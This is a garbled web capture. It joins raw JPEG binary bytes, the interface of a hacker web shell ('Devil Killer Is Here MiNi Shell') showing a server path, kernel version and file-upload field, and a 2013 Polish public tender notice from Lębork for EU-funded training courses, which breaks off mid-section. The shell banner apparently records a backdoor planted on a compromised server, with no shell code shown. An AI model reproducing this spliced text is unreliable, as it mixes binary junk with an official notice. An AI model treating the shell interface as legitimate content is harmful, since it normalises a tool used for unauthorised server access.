JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130814/330034-N-2013.html

<p class="kh_header"><b>Lębork: Przeprowadzenie kursów i warsztatów w ramach realizacji projektu pn.: Aktywizacja społeczno - zawodowa Brama Perspektyw,
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2. - Programu Operacyjnego Kapitał Ludzki - 5 zadań.</b><br>
<b>Numer ogłoszenia: 330034 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 59 8628 106, faks 59 8628 106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprlebork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów i warsztatów w ramach realizacji projektu pn.: Aktywizacja społeczno - zawodowa Brama Perspektyw,
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2. - Programu Operacyjnego Kapitał Ludzki - 5 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursów i warsztatów w ramach realizacji projektu pn.: Aktywizacja społeczno - zawodowa Brama Perspektyw,
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2. - Programu Operacyjnego Kapitał Ludzki - 5 zadań.
Szczegółowy opis przedmiotu zamówienia zamieszczono w załącznikach do SIWZ - Załącznik nr 1: 1a-1g, tj.:
zadanie 1 - załącznik 1-1a: Kurs administratora sieci informatycznej - dla 1 osoby
zadanie 2 - załącznik 1-1b: Kurs grafiki komputerowej - dla 1 osoby
zadanie 3 - załącznik 1-1c: Kurs eksploatacji urządzeń energetycznych o napięciu  do 1 kV - dla 1 osoby
zadanie 4 - załącznik 1-1d: Warsztat kompetencji zawodowych (dwudniowy, wyjazdowy, grupowy) - dla 18 osób
zadanie 5 - załącznik 1-1e: Warsztat kompetencji społeczno - zawodowych - dla 14 osób
Istnieje możliwość, dla każdego z zadań, zmniejszenia lub zwiększenia ilości uczestników/czek w zależności od zdiagnozowanych bieżących potrzeb adresatów zadań, z tym, że płatność nastąpi za cenę ofertową brutto razy ilość osób rzeczywiście uczestniczących w kursie/warsztacie (skierowanych przez Zamawiającego).
Adresatami zadania są osoby bezrobotne, nieaktywne zawodowo lub zatrudnione, będące w wieku aktywności zawodowej, korzystające z pomocy społecznej, zagrożone wykluczeniem społecznym, należące do jednej z grup:
osób usamodzielnianych opuszczających rodziny zastępcze i placówki opiekuńczo - wychowawcze,
osób przebywających w placówce opiekuńczo - wychowawczej lub rodzinie zastępczej,
osób niepełnosprawnych.
W zadaniu 4 - adresatami są tylko osoby niepełnosprawne, nie występuje jednak konieczność zabezpieczania organizacji zajęć pod kątem likwidacji barier dla tych osób, natomiast w zadaniu 5 - tylko osoby usamodzielniane opuszczające rodziny zastępcze i placówki opiekuńczo - wychowawcze oraz osób przebywające w placówce opiekuńczo - wychowawczej lub rodzinie zastępczej. 
Ilość osób uczestniczących w warsztatach może ulec zmniejszeniu lub zwiększeniu, nie więcej jednak niż 2 osoby dla każdego z zadań.
Ponadto w warsztatach ze strony Zamawiającego powinni uczestniczyć odpowiednio:
dla zadania 4: 2 opiekunów - pracowników Zamawiającego oraz opiekuna/ów osób niepełnosprawnych (w przypadku uczestnictwa osób niepełnosprawnych wymagających opiekuna). 
dla zadania 5: - 2 opiekunów pracowników Zamawiającego lub Placówki Opiekuńczo-Wychowawczej w Lęborku.
Przedmiot zamówienia obejmuje:
Zadanie 1 - Kurs administratora sieci informatycznej - dla 1 osoby, zadanie 2 - Kurs grafiki komputerowej - dla 1 osoby oraz zadanie 3 - Kurs eksploatacji urządzeń energetycznych o napięciu  do 1 kV - dla 1 osoby:
zorganizowanie i przeprowadzenie wszystkich zajęć kursu dostosowanych do jego uczestników/uczestniczek zgodnie z załącznikami odpowiednio nr 1: 1a-1c, w tym w szczególności zabezpieczenie dostosowanych do uczestników/uczestniczek sal, wyposażenia, toku prowadzonych zajęć;
przeprowadzenia godzin zajęć teoretycznych;
przeprowadzenia godzin zajęć praktycznych;
zapewnienie niezbędnych materiałów do nauki i przekazanie materiałów szkoleniowych każdemu uczestnikowi/uczestniczce na własność oraz jednego egzemplarza materiałów lub ich kopi lub zdjęć Zamawiającemu;
przeprowadzenie egzaminów (teoretycznych i praktycznych);
wydanie zaświadczeń o ukończeniu kursu zgodne z rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. Nr 31, poz. 216;
wydanie certyfikatów uczestnictwa w kursie zawierające w szczególności: imię i nazwisko uczestnika/uczestniczki, termin odbywania kursu, łączną ilość godzin zajęć kursu, dane Wykonawcy kursu, dane Zamawiającego kurs, informację o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, logotypy UE (EFS) i POKL, podpisy i pieczątki Wykonawcy, oraz
w ramach zadania 3 - Kurs eksploatacji urządzeń energetycznych o napięciu  do 1 kV powinien zakończyć się wydaniem świadectwa potwierdzającego uzyskanie uprawnień w zakresie eksploatacji urządzeń energetycznych o napięciu do 1 KV;
przeprowadzenie wśród uczestników/czek zajęć oceny merytorycznej przebiegu kursu, na podstawie formularza ankiety oceniającej.
zadanie 4 - Warsztat kompetencji zawodowych (dwudniowy, wyjazdowy, grupowy) - dla 18 osób, zadanie 5 - załącznik 1-1e: Warsztat kompetencji społeczno zawodowych - dla 14 osób:
zorganizowanie i przeprowadzenie wszystkich zajęć warsztatów oraz pobytu w miejscach i formie dostosowanych do jego uczestniczek/uczestników zgodnie z załącznikami - odpowiednio 1d i 1e;
przeprowadzenie zajęć w formie przekazania wiedzy teoretycznej oraz przeprowadzenie ćwiczeń i zadań praktycznych, testów w zakresie organizowanych warsztatów celem podniesienia atrakcyjności i efektywności prowadzonych zajęć;
zapewnienie niezbędnych materiałów do przeprowadzenia zajęć i przekazanie materiałów szkoleniowych każdemu uczestnikowi/uczestniczce - zgodnie z załącznikiem odpowiednio 1d i 1e;
wydanie certyfikatów ukończenia warsztatów zawierających minimum: imię, nazwisko, ilość godzin odbytych zajęć, tytuł, tematy zajęć i ich czasowy zakres trwania oraz informacje o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, pieczęci i podpisów organizatora i wykładowców,
pobyt całodobowy wszystkich - adresatów zadania - uczestników/czek i opiekunów wraz z noclegiem i wyżywieniem w miejscu wskazanym przez Wykonawcę,
transport adresatów zadania, zgodnie ze wskazaniami SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.57.00.00-0, 98.34.10.00-5, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli Wykonawca posiada: dla zadań 1 - 3 - wpis do rejestru instytucji szkoleniowych Wojewódzkiego Urzędu Pracy, właściwych ze względu na siedzibę instytucji szkoleniowej; dla zadania 4 - wpis do rejestru ośrodków realizujących turnusy rehabilitacyjne i organizatorów turnusów rehabilitacyjnych; dla zadań 5 - Zamawiający nie określa szczegółowo warunku w tym zakresie.
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych; metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli Wykonawca w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował należycie: 
dla zadań 1 - 2 - co najmniej jedną usługę szkoleniową w zakresie informatyki np. grafiki, administracji sieci komputerowych, stron internetowych, 
dla zadania 3 - co najmniej jedną usługę szkoleniową w zakresie eksploatacji urządzeń energetycznych o napięciu  do 1 kV;
c)	dla zadań 4 i 5: co najmniej jeden, grupowy (co najmniej dla jednorazowo 10 osób), minimum dwudniowy, warsztat, szkolenie lub kurs, organizowane dla osób w obszarze pomocy i integracji społecznej. Powinny one obejmować jednocześnie:
przeprowadzenia zajęć wraz z przygotowaniem i dostarczeniem materiałów szkoleniowych oraz
usługi restauracyjno-hotelową (nocleg, wyżywienie, pobyt).
Wykonawca poda ich wartości, przedmiot, daty wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane należycie.
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz wykazu usług: metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli Wykonawca dysponuje odpowiednim potencjałem technicznym do przeprowadzenia danego typu zajęć, w szczególności:
dla zadań 1-3: sprzętem, urządzeniami i pomieszczeniami dostosowanymi i wyposażonymi do prowadzania kursów. Sale przystosowane pod względem sanitarnym, przeciwpożarowym, oświetleniowym, akustycznym i bhp do prowadzenia kursów:
wyposażone w odpowiednią liczbę miejsc siedzących i stolików, 
wyposażone w odpowiednie oprzyrządowanie techniczne, w szczególności dla zadań 1-2 tj.: w komputery i oprogramowanie oraz aparaturę audiowizualną, rzutnik tablicę Flip chart, itp. 
dostosowane do potrzeb osób niepełnosprawnych,
oznakowane zgodnie z wytycznymi dostępnymi na stronie internetowej http://www.efs.gov.pl, zakładka Dokumenty nt.: Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
dla zadań 4-5:
miejscami noclegowych, w szczególności dla zadania 4 w ośrodku będącym realizatorem turnusów rehabilitacyjnych natomiast dla zadania 5 może być to hotel o standardzie minimum *** zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19.08.2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (t.j. Dz. U. z 2006 r. Nr 22 poz. 169), dla wszystkich uczestników warsztatów wskazanych w pkt. 4.3;
salami konferencyjnych/szkoleniowymi na wszystkie zajęcia warsztatów;
możliwością zapewnienia (przygotowania i spożywania) posiłków - wyżywienia (ciepłe posiłki, śniadania, obiady i poczęstunek kawowy) zgodnie z załącznikiem odpowiednio 1: 1d i 1e, dla wszystkich uczestników/czek warsztatów (pkt. 4.3).
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych: metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli Wykonawca dysponuje osobami z minimum rocznym doświadczeniem zawodowym i kwalifikacjami w zakresie prowadzenia danego typu kursów i danego rodzaju (tematu) zajęć warsztatów, które będą uczestniczyć w wykonaniu zamówienia, oraz złoży informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonanych przez nie czynności.
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz wykazu osób; metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli Wykonawca nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Wykonawca winien posiadać ubezpieczenie OC w ramach prowadzonej działalności.
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych; metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian, w następujących przypadkach:
przedłużającej się procedury wyboru najkorzystniejszej oferty - dopuszcza się przesunięcie terminu rozpoczęcia realizacji zadań,
złożenie odwołania - dopuszcza się przesunięcie terminu rozpoczęcia realizacji zadań,
zrekrutowania mniejszej lub większej liczby uczestników/uczestniczek kursów w stosunku do zakładanej ich liczby - dopuszcza się zmianę liczby uczestników/uczestniczek zadań i wynagrodzenia Wykonawcy,
w przypadku sytuacji braku możliwości wykonania przedmiotu zamówienia przez osoby wskazane na wykazie osób Zamawiający dopuści możliwość zaangażowanie innych osób, pod warunkiem posiadania przez nie wymaganych kwalifikacji i doświadczenia,
wystąpienia losowych zdarzeń uniemożliwiających realizację zadań w zakładanym terminie - dopuszcza się przesunięcie terminu ich realizacji,
wystąpienia okoliczności uniemożliwiających realizację zadań w miejscu ich organizacji - dopuszcza się zmianę miejsca organizacji zadań, pod warunkiem wyrażenia zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprlebork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE CENTRUM POMOCY RODZINIE 
Adres: ul. Czołgistów 5, 84-300 Lębork
Telefon: tel/fax. 0-59 8628-106
e-mai: pcpr.lebork@interia.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2013 godzina 10:00, miejsce: POWIATOWE CENTRUM POMOCY RODZINIE 
Adres: ul. Czołgistów 5, 84-300 Lębork, pok. 237.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT AKTYWIZACJA SPOŁECZNO - ZAWODOWA BRAMA PERSPEKTYW WSPÓŁFINANSOWANY JEST ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO - PRIORYTET VII DZIAŁANIE 7.1. PODDZIAŁANIA 7.1.2. PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Kurs administratora sieci informatycznej - dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny czas trwania kursu - 30 godzin, oraz EGZAMIN - część praktyczna i część teoretyczna. 
Zamawiający dopuszcza organizację i przeprowadzenie realizacji zadania przez połączenie grupy uczestników/uczestniczek kursu z ogólnodostępnym kursem organizowanym przez Wykonawcę poza niniejszym zamówieniem, pod warunkiem, że nie będzie to miało wpływu, na jakość i terminowość świadczonych usług na rzecz Zamawiającego. Wykonawca nie ma obowiązku informowania Zamawiającego o zaistnieniu tych okoliczności
Materiały szkoleniowe dla uczestniczek/uczestników:
Notatnik, długopis, pendrive i/lub inny nośnik danych z zapisanymi materiałami szkoleniowymi typu: schematy, słownik, nagrania.
Materiały szkoleniowe przeznaczone na potrzeby kursów powinny zapewnić wysoki poziom merytoryczny, przejrzystość i spójność zawartych informacji oraz rzeczowość i kompleksowość. Materiały winny być przekazane na stałe uczestnikom/uczestniczkom kursu oraz 1 komplet lub kserokopia lub zdjęcia dla Zamawiającego. Wykonawca powinien udokumentować przekazanie kursantom/kursantkom materiałów szkoleniowych przez ich sfotografowanie, sporządzenie ich wykazu oraz dokumentu potwierdzającego ich odebranie przez właściwe osoby. 
Materiały winny być oznakowane zgodnie z wytycznymi dostępnymi na stronie internetowej http://www.efs.gov.pl, zakładka Dokumenty nt.: Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Ramowy program kursu, tematy zajęć:
podstawowe zagadnienia dotyczące sieci informatycznej,
struktura sieci informatycznej,
modele schematyczne sieci informatycznych,
protokoły komunikacji w sieciach informatycznych,
typy urządzeń sieciowych, oraz ich poprawna konfiguracja
Dodatkowe wymagania od Wykonawcy:
Zamawiający nie ma dodatkowych żądań do Wykonawcy. Kurs może odbywać się w systemie zaocznym.
Kurs powinien kończyć się egzaminem teoretycznym i praktycznym.
Po odbyciu kursu i zdaniu egzaminów uczestnik projektu winien otrzymać certyfikat.
Termin realizacji kursu:
rozpoczęcie kursu: zalecany termin rozpoczęcia kursu - wrzesień 2013 roku,
